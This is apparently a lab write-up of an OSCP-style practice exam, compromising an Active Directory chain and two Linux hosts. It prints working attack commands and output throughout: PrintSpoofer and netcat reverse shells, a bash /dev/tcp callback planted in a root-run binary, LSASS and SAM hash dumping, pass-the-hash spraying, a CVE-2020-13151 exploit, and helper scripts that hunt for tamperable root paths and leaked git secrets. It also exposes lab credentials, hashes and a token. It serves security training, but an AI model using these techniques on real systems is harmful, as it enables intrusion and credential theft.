Information
About this lab
This lab involves a sophisticated attack chain against an Active Directory environment. Learners begin by exploiting a vulnerable web app to achieve remote code execution, followed by privilege escalation through privilege abuse. Through lateral movement, pivoting across network segments, and cracking Kerberos tickets, learners must enumerate and compromise domain assets to achieve full domain control.
Active Directory Set
192.168.202.141 - MS01
Eric.Wallows / EricLikesRunning800
Nmap
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
81/tcp open hosts2-ns
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3306/tcp open mysql
5985/tcp open wsman
Initial Access
Connected to 192.168.202.141 via Evil-WinRM using provided credentials
┌──(kali㉿kali)-[~/oscp_a]
└─$ evil-winrm -i 192.168.202.141 -u 'Eric.Wallows' -p 'EricLikesRunning800'
*Evil-WinRM* PS C:\Users\eric.wallows\Documents>

Privilege Escalation
Found SeImpersonatePrivilege enabled on the user
┌──(kali㉿kali)-[~/oscp_a]
└─$ evil-winrm -i 192.168.202.141 -u 'Eric.Wallows' -p 'EricLikesRunning800'
*Evil-WinRM* PS C:\Users\eric.wallows\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= =======
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled

Used PrintSpoofer64 to escalate privileges to SYSTEM. SeImpersonatePrivilege lets the process impersonate any client that connects to a named pipe it owns; PrintSpoofer coerces the Print Spooler service into connecting to such a pipe as SYSTEM, so it only works while the spooler is running.
*Evil-WinRM* PS C:\Users\eric.wallows\Documents> upload PrintSpoofer64.exe
*Evil-WinRM* PS C:\Users\eric.wallows\Documents> upload nc64.exe
*Evil-WinRM* PS C:\Users\eric.wallows\Documents> .\PrintSpoofer64.exe -c "nc64.exe 192.168.45.204 4444 -e powershell"

Successfully established reverse shell connection using nc
┌──(kali㉿kali)-[~/oscp_a]
└─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [192.168.45.204] from (UNKNOWN) [192.168.202.141] 55321
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Windows\system32>

Post-Exploitation
Added the eric.wallows account to the local Administrators group from the SYSTEM shell, so the WinRM credentials already in hand now give administrative access to MS01
PS C:\Users> net localgroup Administrators eric.wallows /add
net localgroup Administrators eric.wallows /add
The command completed successfully.

Dumped credentials from LSASS using the NetExec (nxc) lsassy module, which needs the local administrator rights just granted, and obtained two NTLM hashes: celia.almeda is a domain account (OSCP\), Mary.Williams is local to MS01 (MS01\)
- celia.almeda:e728ecbadfb02f51ce8eed753f3ff3fd
- Mary.Williams:9a3121977ee93af56ebd0ef4f527a35e
┌──(kali㉿kali)-[~/oscp_a]
└─$ nxc smb 192.168.202.141 -u 'Eric.Wallows' -p 'EricLikesRunning800' -M lsassy
SMB 192.168.202.141 445 MS01 [*] Windows 10 / Server 2019 Build 19041 x64 (name:MS01) (domain:oscp.exam) (signing:False) (SMBv1:False)
SMB 192.168.202.141 445 MS01 [+] oscp.exam\Eric.Wallows:EricLikesRunning800 (Pwn3d!)
LSASSY 192.168.202.141 445 MS01 OSCP\celia.almeda e728ecbadfb02f51ce8eed753f3ff3fd
LSASSY 192.168.202.141 445 MS01 MS01\Mary.Williams 9a3121977ee93af56ebd0ef4f527a35e

Pivoting
Set up Ligolo-ng proxy server and configured tunnel interface with route to internal network (10.10.162.0/24)
┌──(kali㉿kali)-[~/oscp_a]
└─$ sudo ligolo-proxy -selfcert
[sudo] password for kali:
INFO[0000] Loading configuration file ligolo-ng.yaml
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
INFO[0000] Listening on 0.0.0.0:11601
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/
Made in France ♥ by @Nicocha30!
Version: dev
ligolo-ng » INFO[0182] Agent joined. id=005056ab00d4 name="NT AUTHORITY\\SYSTEM@MS01" remote="192.168.202.141:53233"
ligolo-ng »
ligolo-ng » session
? Specify a session : 1 - NT AUTHORITY\SYSTEM@MS01 - 192.168.202.141:53233 - 005056ab00d4
[Agent : NT AUTHORITY\SYSTEM@MS01] » interface_create --name ligolo
INFO[0189] Creating a new ligolo interface...
INFO[0189] Interface created!
[Agent : NT AUTHORITY\SYSTEM@MS01] » start
INFO[0192] Starting tunnel to NT AUTHORITY\SYSTEM@MS01 (005056ab00d4)
[Agent : NT AUTHORITY\SYSTEM@MS01] » route_add --name ligolo --route 10.10.162.0/24
INFO[0219] Route created.

Executed the Ligolo-ng agent on MS01 to create the pivot tunnel; once it connects back to the proxy, the "Agent joined" line shown above appears and the session can be selected
*Evil-WinRM* PS C:\Users\eric.wallows\Documents> .\agent.exe -connect 192.168.45.204:11601 -ignore-cert

10.10.162.142 - MS02
Nmap
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
5985/tcp open wsman

Lateral Movement (MS01 to MS02)
Used nxc to spray the NTLM hashes across the internal hosts (users.txt and hashes.txt hold the usernames and NT hashes gathered so far) and successfully authenticated to MS02 (10.10.162.142) over WinRM as celia.almeda
┌──(kali㉿kali)-[~/oscp_a]
└─$ nxc winrm 10.10.162.140 10.10.162.142 -u users.txt -H hashes.txt -t 100
WINRM 10.10.162.140 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:oscp.exam)
WINRM 10.10.162.142 5985 MS02 [*] Windows 10 / Server 2019 Build 19041 (name:MS02) (domain:oscp.exam)
WINRM 10.10.162.142 5985 MS02 [+] oscp.exam\celia.almeda:e728ecbadfb02f51ce8eed753f3ff3fd (Pwn3d!)

Connected to MS02 via Evil-WinRM, passing celia.almeda's NT hash instead of a password
┌──(kali㉿kali)-[~/oscp_a]
└─$ evil-winrm -i 10.10.162.142 -u 'celia.almeda' -H 'e728ecbadfb02f51ce8eed753f3ff3fd'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\celia.almeda\Documents>

Privilege Escalation
Downloaded the SAM and SYSTEM hives left behind by an old Windows installation under C:\windows.old; unlike the live hives, these copies are not locked by the OS and were readable with the current user's rights
*Evil-WinRM* PS C:\windows.old\Windows\System32> download SAM
*Evil-WinRM* PS C:\windows.old\Windows\System32> download SYSTEM

Dumped the NTLM hashes from the offline SAM with impacket-secretsdump. The Administrator hash 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty string (blank password or disabled account), so only the other four hashes are worth spraying
- Administrator:31d6cfe0d16ae931b73c59d7e0c089c0
- tom_admin:4979d69d4ca66955c075c41cf45f24dc
- Cheyanne.Adams:b3930e99899cb55b4aefef9a7021ffd0
- David.Rhys:9ac088de348444c71dba2dca92127c11
- Mark.Chetty:92903f280e5c5f3cab018bd91b94c771
┌──(kali㉿kali)-[~/oscp_a]
└─$ impacket-secretsdump -sam SAM -system SYSTEM LOCAL
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x8bca2f7ad576c856d79b7111806b533d
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:acbb9b77c62fdd8fe5976148a933177a:::
tom_admin:1001:aad3b435b51404eeaad3b435b51404ee:4979d69d4ca66955c075c41cf45f24dc:::
Cheyanne.Adams:1002:aad3b435b51404eeaad3b435b51404ee:b3930e99899cb55b4aefef9a7021ffd0:::
David.Rhys:1003:aad3b435b51404eeaad3b435b51404ee:9ac088de348444c71dba2dca92127c11:::
Mark.Chetty:1004:aad3b435b51404eeaad3b435b51404ee:92903f280e5c5f3cab018bd91b94c771:::

Used nxc to spray the new NTLM hashes and successfully authenticated to MS02 (10.10.162.142) as tom_admin. nxc reports the login as oscp.exam\tom_admin, i.e. the domain account of that name reuses the password stored in the old local SAM. Without --no-bruteforce, nxc tries every user against every hash, which is why the output below shows unrelated users being tested with celia.almeda's hash
┌──(kali㉿kali)-[~/oscp_a]
└─$ nxc winrm 10.10.162.142 -u users.txt -H hashes.txt --continue-on-success -t 100
WINRM 10.10.162.142 5985 MS02 [*] Windows 10 / Server 2019 Build 19041 (name:MS02) (domain:oscp.exam)
WINRM 10.10.162.142 5985 MS02 [-] oscp.exam\Aimee.Hunt:e728ecbadfb02f51ce8eed753f3ff3fd
WINRM 10.10.162.142 5985 MS02 [-] oscp.exam\Carol.Webb:e728ecbadfb02f51ce8eed753f3ff3fd
WINRM 10.10.162.142 5985 MS02 [+] oscp.exam\celia.almeda:e728ecbadfb02f51ce8eed753f3ff3fd (Pwn3d!)
WINRM 10.10.162.142 5985 MS02 [-] oscp.exam\celia.almeda:e728ecbadfb02f51ce8eed753f3ff3fd zip() argument 2 is longer than argument 1
WINRM 10.10.162.142 5985 MS02 [-] oscp.exam\Chelsea.Byrne:e728ecbadfb02f51ce8eed753f3ff3fd
WINRM 10.10.162.142 5985 MS02 [-] oscp.exam\Donna.Johnson:e728ecbadfb02f51ce8eed753f3ff3fd
WINRM 10.10.162.142 5985 MS02 [-] oscp.exam\Emily.Bishop:e728ecbadfb02f51ce8eed753f3ff3fd
WINRM 10.10.162.142 5985 MS02 [-] oscp.exam\eric.wallows:e728ecbadfb02f51ce8eed753f3ff3fd
WIN
WINRM 10.10.162.142 5985 MS02 [+] oscp.exam\tom_admin:4979d69d4ca66955c075c41cf45f24dc (Pwn3d!)

Connected to MS02 using Evil-WinRM with the tom_admin hash
┌──(kali㉿kali)-[~/oscp_a]
└─$ evil-winrm -i 10.10.162.142 -u 'tom_admin' -H '4979d69d4ca66955c075c41cf45f24dc'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tom_admin\Documents>

10.10.162.140 - DC01
Nmap
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman

Lateral Movement (MS02 to DC01)
Connected to DC01 (10.10.162.140) via Evil-WinRM using the previously obtained tom_admin hash; it works here because the domain tom_admin account shares the password recovered from MS02's old local SAM
┌──(kali㉿kali)-[~/oscp_a]
└─$ evil-winrm -i 10.10.162.140 -u 'tom_admin' -H '4979d69d4ca66955c075c41cf45f24dc'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\tom_admin\Documents>

Read proof.txt file
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/12/2025 6:50 AM 34 proof.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type proof.txt
a728672bb26239bb2587cc98b930bb55

Independent Challenges
192.168.202.143 - Aero
Nmap
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
81/tcp open hosts2-ns
443/tcp open https
3000/tcp open ppp
3001/tcp open nessus
3003/tcp open cgms
3306/tcp open mysql
5432/tcp open postgresql

Initial Access
Accessed web service on port 81 and found “Attendance and Payroll System” in source code
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title>Attendance and Payroll System</title>

Searched for “3003/tcp open cgms” and found CVE-2020-13151. The cgms label is only nmap's port-table name for 3003/tcp; the exploit below identifies the service as Aerospike (build 5.1.0.1), and CVE-2020-13151 is unauthenticated remote code execution through Lua user-defined functions (UDFs) registered with the database
Used a public CVE-2020-13151 proof-of-concept exploit
┌──(kali🎃kali)-[~/oscp_a/143/CVE-2020-13151]
└─$ python cve2020-13151.py --ahost 192.168.202.143 --netcatshell --lhost=192.168.45.204 --lport=3000
[+] aerospike build info: 5.1.0.1
[+] looks vulnerable
[+] populating dummy table.
[+] writing to test.cve202013151
[+] wrote MzTztxQFPOETJUBD
[+] registering udf
[+] sending payload, make sure you have a listener on 192.168.45.204:3000.....

Successfully established reverse shell connection using nc
┌──(kali🎃kali)-[~]
└─$ rlwrap nc -nlvp 3000
listening on [any] 3000 ...
connect to [192.168.45.204] from (UNKNOWN) [192.168.202.143] 58878
/bin/sh: 0: can't access tty; job control turned off
$

Upgraded shell for convenience
python -c 'import pty; pty.spawn("/bin/bash")'

Read local.txt file
aero@oscp:/home/aero$ cat local.txt
cat local.txt
d215e07defe543400153f2fb5c6f30f3

Privilege Escalation
Transferred linpeas.sh from Kali to the target for enumeration, pulling it over scp from the Kali SSH server
aero@oscp:/etc$ scp kali@192.168.45.204:~/oscp_a/tools/linpeas.sh /tmp/
scp kali@192.168.45.204:~/oscp_a/tools/linpeas.sh /tmp/
The authenticity of host '192.168.45.204 (192.168.45.204)' can't be established.
ECDSA key fingerprint is SHA256:vRI4BwMX0mkIFr1rxD1EuPqzvvum/BOX43B/o3MN8ps.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
yes
Warning: Permanently added '192.168.45.204' (ECDSA) to the list of known hosts.
kali@192.168.45.204's password: kali
linpeas.sh 100% 953KB 1.3MB/s 00:00

linpeas found a cron job running /root/aerospike.sh as root every minute, but the script itself cannot be read due to permissions
╔══════════╣ Check for vulnerable cron jobs
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs
══╣ Cron jobs list
*/1 * * * * root /root/aerospike.sh

Found /opt/aerospike/bin/asadm being executed regularly as root (UID=0) with pspy64, which reveals what the unreadable aerospike.sh runs
2025/12/13 17:24:08 CMD: UID=0 PID=65228 | python2.7 /opt/aerospike/bin/asadm --asinfo-mode -e 'STATUS'
2025/12/13 17:24:09 CMD: UID=0 PID=65230 | python2.7 /opt/aerospike/bin/asadm --asinfo-mode -e 'STATUS'

Confirmed /opt/aerospike/bin/asadm is owned by, and therefore writable by, the current user (aero)
aero@oscp:/$ ls -al /opt/aerospike/bin/asadm
ls -al /opt/aerospike/bin/asadm
-rwxr-xr-x 1 aero aero 6723733 Dec 7 2019 /opt/aerospike/bin/asadm

Overwrote /opt/aerospike/bin/asadm with a reverse-shell payload. The replacement has no shebang line, so it only runs because the calling shell falls back to interpreting the file as a script when exec fails; starting it with #!/bin/bash removes that dependency, and copying the original aside first (cp asadm asadm.bak) keeps the host usable afterwards
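The check performed by hand here (cron entry, pspy command line, ls -l on the executable) generalises to: collect every command that runs as root, extract the absolute paths it references, and report those the current user can modify or replace. The script below is an added example written for this writeup, not a tool from the original lab. It parses crontab lines as linpeas prints them and pspy "CMD:" lines, and its sample input is constructed: the asadm path is rewritten to a stand-in file created in a temporary directory so the script runs offline, while /root/aerospike.sh and the /nonexistent_dir paths are kept as negative cases.

```python
"""Find root-executed commands whose executable the current user can tamper with.

Added example for this writeup, not a tool from the original lab. Parses
crontab lines (as linpeas prints them) and pspy 'CMD:' lines, extracts the
absolute paths each command touches, and reports those we can modify or replace.
The sample lines in demo() are constructed."""
import os
import re
import shlex
import stat
import tempfile

# "*/1 * * * * root /root/aerospike.sh"  or  "@reboot root /x"  (user-field crontab format)
CRON_RE = re.compile(r"^\s*(?:@\w+\s+|(?:\S+\s+){5})(?P<user>\S+)\s+(?P<cmd>.+)$")
# "2025/12/13 17:24:08 CMD: UID=0 PID=65228 | python2.7 /opt/aerospike/bin/asadm ..."
PSPY_RE = re.compile(r"CMD:\s+UID=(?P<uid>\d+)\s+PID=\d+\s+\|\s+(?P<cmd>.+)$")


def extract_commands(lines):
    """Yield (runs_as, command) from crontab and pspy lines; other lines are skipped."""
    for line in lines:
        m = PSPY_RE.search(line)
        if m:
            who = "root" if m.group("uid") == "0" else m.group("uid")
            yield (who, m.group("cmd").strip())
            continue
        m = CRON_RE.match(line)
        if m:
            yield (m.group("user"), m.group("cmd").strip())


def paths_in(command):
    """Absolute paths appearing as tokens of a command line."""
    try:
        tokens = shlex.split(command)
    except ValueError:  # unbalanced quotes: fall back to a naive split
        tokens = command.split()
    return [t for t in tokens if t.startswith("/")]


def can_tamper(path):
    """True if we can write the file, or create/replace it in its directory
    (a sticky directory only allows replacing files we own)."""
    if os.path.isdir(path):
        return False
    parent = os.path.dirname(path) or "/"
    if os.path.exists(path):
        if os.access(path, os.W_OK):
            return True
        sticky = bool(os.stat(parent).st_mode & stat.S_ISVTX)
        owned = os.stat(path).st_uid == os.geteuid()
        return os.access(parent, os.W_OK) and (owned or not sticky)
    return os.access(parent, os.W_OK)


def writable_root_targets(lines):
    """Sorted (path, command) pairs where a root-run command references a path we can tamper with."""
    hits = set()
    for who, cmd in extract_commands(lines):
        if who != "root":
            continue
        for p in paths_in(cmd):
            if can_tamper(p):
                hits.add((p, cmd))
    return sorted(hits)


def demo():
    """Constructed sample: a stand-in asadm we own in a temp dir, plus the cron and
    pspy lines from this page with the asadm path rewritten to that copy."""
    d = tempfile.mkdtemp(prefix="cronchk_")
    asadm = os.path.join(d, "asadm")
    with open(asadm, "w") as f:
        f.write("#!/usr/bin/env python2.7\n")  # stand-in for the real 6.7 MB script
    os.chmod(asadm, 0o755)
    lines = [
        "*/1 * * * * root /root/aerospike.sh",                                   # unreadable, not ours
        f"2025/12/13 17:24:08 CMD: UID=0 PID=65228 | python2.7 {asadm} --asinfo-mode -e 'STATUS'",
        f"2025/12/13 17:24:10 CMD: UID=1000 PID=65231 | {asadm} --help",          # not root: ignored
        "0 3 * * * www-data /nonexistent_dir/cleanup.sh",                         # not root: ignored
        "*/5 * * * * root /nonexistent_dir/backup.sh",                            # parent dir missing
    ]
    return asadm, writable_root_targets(lines)


if __name__ == "__main__":
    for path, cmd in demo()[1]:
        print(f"[!] {path} is tamperable and run as root by: {cmd}")
```

On a real host, feed it the crontab lines from linpeas and a saved pspy log; anything it prints is a candidate for exactly the overwrite used here.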
aero@oscp:/$ echo "/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.204/443 0>&1'" > /opt/aerospike/bin/asadm

Successfully established reverse shell connection and read proof.txt
┌──(kali🎃kali)-[~/oscp_a/143]
└─$ nc -nlvp 443
listening on [any] 443 ...
connect to [192.168.45.204] from (UNKNOWN) [192.168.202.143] 50914
bash: cannot set terminal process group (66614): Inappropriate ioctl for device
bash: no job control in this shell
root@oscp:/#
root@oscp:~# cat /root/proof.txt
cat /root/proof.txt
7892ec77669dc931577f4eac740479f5

192.168.202.144 - Crystal
Nmap
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http

Initial Access
Found an exposed .git directory with nmap's http-git script. The repository's remote URL also embeds a GitHub personal access token (the ghp_ prefix), which is a leaked secret in its own right
80/tcp open http Apache httpd 2.4.52 ((Ubuntu))
|_http-generator: Nicepage 4.21.12, nicepage.com
|_http-title: Home
|_http-server-header: Apache/2.4.52 (Ubuntu)
| http-git:
| 192.168.202.144:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
| Last commit message: Security Update
| Remotes:
|_ https://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@github.com/PWK-Challenge-Lab/dev.git

Accessed the .git directory over HTTP
http://192.168.202.144/.git/
Dumped Git repository using wget
┌──(kali🎃kali)-[~/oscp_a/144]
└─$ wget -r "http://192.168.202.144/.git/"

Read the Git log
┌──(kali🎃kali)-[~/oscp_a/144/192.168.202.144/.git]
└─$ git log
commit 44a055daf7a0cd777f28f444c0d29ddf3ff08c54 (HEAD -> main)
Author: Stuart <luke@challenge.pwk>
Date: Fri Nov 18 16:58:34 2022 -0500
Security Update
commit 621a2e79b3a4a08bba12effe6331ff4513bad91a (origin/main, origin/HEAD)
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 23:57:12 2022 +0200
Create database.php
commit c9c8e8bd0a4b373190c4258e16e07a6296d4e43c
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 23:56:19 2022 +0200
Delete database.php
commit eda55ed6455d29532295684e3900cda74d695067
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 17:27:40 2022 +0200
Create robots.txt
commit ce3d418cc1bb5c5388fdc00cee5ba1cb764f499b
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 17:27:08 2022 +0200
Create search.php
commit 80ad5fe45438bb1b9cc5932f56af2e9be7e96046
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 17:26:09 2022 +0200
Setting up database.php
commit 58cfadc91978ec5db50a03c571493e3038d2935d
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 17:22:48 2022 +0200
Create index.php
commit 5e212bcd0b8d5815af1c4fdfccd6a07c16e1330b
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 17:22:22 2022 +0200
Create order.php
commit 0822a51f607bb05c0e6230acd74f27e7b6130934
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 17:21:50 2022 +0200
Create export.php
commit 1c48db4a587970ee95208f3f408676505e343318
Author: PWK-Challenge-Lab <118549472+PWK-Challenge-Lab@users.noreply.github.com>
Date: Fri Nov 18 17:21:11 2022 +0200
Initial commit

Found hardcoded credentials in the Git commit history: the HEAD commit “Security Update” removed them from configuration/database.php, but they remain in the previous revision
- stuart@challenge.lab / BreakingBad92
┌──(kali🎃kali)-[~/oscp_a/144/192.168.202.144/.git]
└─$ git show 44a055daf7a0cd777f28f444c0d29ddf3ff08c54
commit 44a055daf7a0cd777f28f444c0d29ddf3ff08c54 (HEAD -> main)
Author: Stuart <luke@challenge.pwk>
Date: Fri Nov 18 16:58:34 2022 -0500
Security Update
diff --git a/configuration/database.php b/configuration/database.php
index 55b1645..8ad08b0 100644
--- a/configuration/database.php
+++ b/configuration/database.php
@@ -2,8 +2,9 @@
class Database{
private $host = "localhost";
private $db_name = "staff";
- private $username = "stuart@challenge.lab";
- private $password = "BreakingBad92";
+ private $username = "";
+ private $password = "";
+// Cleartext creds cannot be added to public repos!
public $conn;
public function getConnection() {
$this->conn = null;

Authenticated to the target via SSH using the discovered password (the database username stuart@challenge.lab maps to the local user stuart)
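The git show step above generalises: a "cleanup" commit only proves that secrets exist one revision earlier, so scanning the removed ('-') lines of the history (git log -p) is the quickest way to recover them, and the remote URL in .git/config is worth checking for embedded tokens too. The scanner below is an added example written for this writeup, not a tool from the original lab. Its sample input is constructed from the diff and the nmap http-git output shown on this page; the assignment regex is a deliberately simple pattern for password/secret/token/username keys and will miss other conventions.

```python
"""Scan a unified diff (git show / git log -p output) for credentials that a
commit removed, plus GitHub tokens anywhere in text such as .git/config.

Added example for this writeup, not a tool from the original lab. The sample
diff and remote line below are constructed from what this page shows."""
import re

# Assignment-style secrets: $password = "x", password: x, TOKEN=x, secret => 'x' ...
ASSIGN_RE = re.compile(
    r"""(?P<key>\$?\b(?:pass(?:word|wd)?|secret|token|api[_-]?key|username|user)\b)
        \s*(?:=>|=|:)\s*
        (?P<q>["']?)(?P<value>[^"'\s;]+)(?P=q)""",
    re.IGNORECASE | re.VERBOSE)
# Classic GitHub personal access tokens: ghp_ followed by 36 alphanumerics.
GHP_RE = re.compile(r"\bghp_[A-Za-z0-9]{36}\b")


def find_removed_secrets(diff_text):
    """Return [(file, key, value)] for secret-looking assignments on lines the
    diff removed ('-' lines): values a commit scrubbed but that stay in history.
    Empty values do not match the pattern and are therefore ignored."""
    found = []
    current_file = None
    for line in diff_text.splitlines():
        if line.startswith("--- a/"):
            current_file = line[6:]
            continue
        if line.startswith("--- ") or line.startswith("+++ "):
            continue
        if not line.startswith("-"):
            continue  # context and added lines are not what we want
        m = ASSIGN_RE.search(line[1:])
        if m:
            found.append((current_file, m.group("key").lstrip("$").lower(), m.group("value")))
    return found


def find_github_tokens(text):
    """Return every classic GitHub PAT found in text (e.g. a remote URL)."""
    return GHP_RE.findall(text)


# Constructed sample: the 'Security Update' commit from this page.
SAMPLE_DIFF = """\
diff --git a/configuration/database.php b/configuration/database.php
index 55b1645..8ad08b0 100644
--- a/configuration/database.php
+++ b/configuration/database.php
@@ -2,8 +2,9 @@
 class Database{
 private $host = "localhost";
 private $db_name = "staff";
- private $username = "stuart@challenge.lab";
- private $password = "BreakingBad92";
+ private $username = "";
+ private $password = "";
+// Cleartext creds cannot be added to public repos!
 public $conn;
"""
# Constructed sample: the remote line as it would appear in .git/config.
SAMPLE_REMOTE = "\turl = https://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@github.com/PWK-Challenge-Lab/dev.git"

if __name__ == "__main__":
    # Typical use: git log -p --all | python3 scan_diff.py  (read sys.stdin instead of SAMPLE_DIFF)
    for path, key, value in find_removed_secrets(SAMPLE_DIFF):
        print(f"[!] {path}: {key} = {value}")
    for tok in find_github_tokens(SAMPLE_REMOTE):
        print(f"[!] GitHub token in remote: {tok}")
```

Run against the full history with git log -p --all so that commits on other branches are covered as well; the dumped .git directory here contains the objects needed for that, not just the working tree.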
┌──(kali🎃kali)-[~/oscp_a/144]
└─$ ssh stuart@192.168.202.144
The authenticity of host '192.168.202.144 (192.168.202.144)' can't be established.
ED25519 key fingerprint is: SHA256:NQ0P6b7BgHDdEToc64di95hvEzS2pdZ7E02r4ZBkBYM
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:56: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.202.144' (ED25519) to the list of known hosts.
stuart@192.168.202.144's password:
Welcome to Ubuntu 22.04.1 LTS (GNU/Linux 5.15.0-53-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Sun Dec 14 03:15:24 PM UTC 2025
System load: 0.0 Processes: 201
Usage of /: 39.9% of 18.53GB Users logged in: 0
Memory usage: 7% IPv4 address for ens160: 192.168.202.144
Swap usage: 0%
* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.
https://ubuntu.com/engage/secure-kubernetes-at-the-edge
0 updates can be applied immediately.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Mon Oct 31 14:48:02 2022 from 192.168.118.5
stuart@oscp:~$

Read local.txt file
stuart@oscp:~$ cat local.txt
cfd945bb16d2480927d571c2deef9cee

Privilege Escalation
Found /opt/backup directory with accessible backup files using linpeas
╔══════════╣ Backup folders
drwxr-xr-x 2 root root 4096 Nov 18 2022 /opt/backup
total 84
-rw-r--r-- 1 stuart stuart 26890 Apr 5 2018 sitebackup1.zip
-rw-r--r-- 1 stuart stuart 24701 Nov 18 2022 sitebackup2.zip
-rw-r--r-- 1 stuart stuart 25312 Mar 5 2020 sitebackup3.zip
drwxr-xr-x 2 root root 3 Apr 15 2020 /snap/core20/1405/var/backups
total 0
drwxr-xr-x 2 root root 3 Apr 15 2020 /snap/core20/1695/var/backups
total 0
drwxr-xr-x 2 root root 4096 Dec 14 15:04 /var/backups
total 724
-rw-r--r-- 1 root root 51200 Dec 14 14:51 alternatives.tar.0
-rw-r--r-- 1 root root 36870 Nov 18 2022 apt.extended_states.0
-rw-r--r-- 1 root root 0 Dec 14 14:51 dpkg.arch.0
-rw-r--r-- 1 root root 268 Oct 31 2022 dpkg.diversions.0
-rw-r--r-- 1 root root 135 Nov 18 2022 dpkg.statoverride.0
-rw-r--r-- 1 root root 636365 Nov 18 2022 dpkg.status.0

Downloaded the backup files to Kali via scp
stuart@oscp:/opt/backup$ scp sitebackup1.zip kali@192.168.45.199:~/oscp_a/144/
The authenticity of host '192.168.45.199 (192.168.45.199)' can't be established.
ED25519 key fingerprint is SHA256:C/sPlE+2KjQOvOF6Xgy+YaE8+67OyeJHsui04dPIApU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.45.199' (ED25519) to the list of known hosts.
kali@192.168.45.199's password:
sitebackup1.zip 100% 26KB 114.0KB/s 00:00
stuart@oscp:/opt/backup$ scp sitebackup2.zip kali@192.168.45.199:~/oscp_a/144/
kali@192.168.45.199's password:
sitebackup2.zip 100% 24KB 109.9KB/s 00:00
